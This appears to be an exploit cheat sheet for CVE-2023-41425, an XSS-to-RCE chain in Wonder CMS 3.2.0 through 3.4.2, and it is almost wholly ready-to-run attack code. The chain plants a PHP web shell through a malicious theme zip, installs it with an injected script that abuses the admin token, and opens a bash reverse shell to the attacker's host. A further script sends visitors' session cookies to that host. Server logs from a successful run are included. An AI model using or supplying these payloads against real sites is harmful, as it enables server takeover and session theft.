Wonder CMS RCE

Description : XSS to RCE, Wonder CMS 3.2.0 <= 3.4.2

Sources

- https://github.com/prodigiousMind/CVE-2023-41425/tree/main

- https://nvd.nist.gov/vuln/detail/CVE-2023-41425

RCE

# Setting vars
RHOST="http://host.com:80"
LHOST="10.10.14.152"
LPORT="4444"
LPORTWEB="80"

# Moving to a tmp dir
cd $(mktemp -d)

# Creating our evil theme zip file
mkdir -p evil
cat <<'EOF'>evil/evil.php
<?=`$_GET[0]`;?>
EOF

zip -r evil.zip evil/

# JS payload that will install the new theme
cat <<EOF>xssrce.js
var xhr=new XMLHttpRequest();
xhr.open("GET", "${RHOST}/?installModule=http://${LHOST}:${LPORTWEB}/evil.zip&directoryName=whatever&type=themes&token=" + document.querySelectorAll('[name="token"]')[0].value, true);
xhr.send();
EOF

# Print XSS url
echo -e "\n# XSS RCE"
cat <<EOF
${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xssrce.js"></script><form+action="
EOF

# Starting a new web server to serve payloads
sudo python3 -m http.server $LPORTWEB &

After sending the RCE XSS to administrator we get the following http calls

10.129.252.14 - - [11/Aug/2024 18:42:26] "GET /xssrce.js HTTP/1.1" 304 -
10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
10.129.252.14 - - [11/Aug/2024 18:42:32] "GET /evil.zip HTTP/1.1" 200 -

We can now make use of the php payload

# id
CMD="id"
curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Reverse shell, (don't forget to listen first: nc -nvlp 4444)
CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"
curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

Cookies

You can also steal cookies (and therefore the php session)

cat <<EOF>xsscookie.js
var xhr=new XMLHttpRequest();
xhr.open("GET", "http://${LHOST}:${LPORTWEB}/?"+document.cookie, true);
xhr.send();
EOF

echo -e "\n# XSS Retrieve PHP session"
cat <<EOF
${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xsscookie.js"></script><form+action="
EOF